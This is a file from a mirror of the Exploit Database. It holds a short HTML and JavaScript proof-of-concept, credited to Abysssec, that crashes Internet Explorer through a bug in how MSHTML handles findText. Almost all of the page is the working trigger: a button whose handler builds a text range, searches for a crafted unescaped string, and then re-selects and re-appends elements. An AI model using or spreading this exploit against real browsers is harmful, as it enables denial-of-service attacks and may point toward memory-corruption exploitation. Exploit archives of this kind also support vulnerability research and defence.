exploit-db-mirror/exploits/windows/dos/15122.html
Offensive Security d304cc3d3e DB: 2017-11-24
116602 new exploits

Too many to list!
2017-11-24 20:56:23 +00:00

22 lines
No EOL
612 B
HTML

<html>
<body>
<input type="button" value="Crachme!" onclick="Search()"/>
<input type="text" value="Abysssec" id="Abysssec">&lt;/textarea&gt;
<script type="text/javascript">
function Search(){
var textinput = document.getElementById("Abysssec");
var textRange = textinput.createTextRange();
textRange.findText(unescape("%u4141"),-1);
textRange.select(document.getElementById('d'));
document.body.appendChild(textinput);
}
</script>
<p id="p">Abysssec</p>
http://www.exploit-db.com/moaub-27-microsoft-internet-explorer-mshtml-findtext-processing-issue/
</body>
</html>
</p>
</body>
</html>